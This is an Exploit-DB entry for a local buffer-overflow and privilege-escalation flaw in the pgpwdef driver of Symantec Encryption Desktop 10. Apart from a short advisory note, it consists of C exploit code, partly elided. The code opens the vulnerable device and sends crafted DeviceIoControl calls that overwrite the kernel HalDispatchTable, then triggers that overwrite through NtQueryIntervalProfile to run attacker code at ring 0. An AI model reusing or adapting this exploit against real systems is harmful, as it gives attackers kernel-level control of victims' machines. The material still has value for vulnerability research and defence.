Symantec Encryption Desktop 10 - Local Buffer Overflow / Local Privilege Escalation

EDB-ID:

38299




Platform:

Windows

Date:

2012-02-25


source: https://www.securityfocus.com/bid/57835/info

Symantec Encryption Desktop is prone to a local buffer-overflow vulnerability. 

A local attacker may exploit this issue to execute arbitrary code with escalated privileges.

#define IO_CONTROL_VULN 0x80022058
 
#define TARGET_DEVICE L"\\Device\\pgpwdef"
 
[..]
 
    usName.Buffer = TARGET_DEVICE;
    usName.Length = usName.MaximumLength = 
(USHORT)(wcslen(usName.Buffer) * sizeof(WCHAR));
 
    InitializeObjectAttributes(&ObjAttr, &usName, OBJ_CASE_INSENSITIVE , 
NULL, NULL);    
 
 
    // get handle of target devide
    ns = f_NtOpenFile(
        &hDev,
        FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
        &ObjAttr,
        &StatusBlock,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_SYNCHRONOUS_IO_NONALERT
    );
 
[..]
 
    BOOL bStatus = DeviceIoControl(
        hDev,
        IO_CONTROL_VULN,
        InBuff, 0x8,
        OutBuff, 0x8,
        &dwReturnLen, NULL
    );
 
    dwReturnLen = 0;
    bStatus = DeviceIoControl(
        hDev,
        IO_CONTROL_VULN,
        InBuff, sizeof(PVOID),
        (PUCHAR)m_HalDispatchTable, 0,
        &dwReturnLen, NULL
    );
 
[..]
 
    f_NtQueryIntervalProfile(ProfileTotalIssues, &Interval);
 
[..]
 
Your evil code processes with CPL==0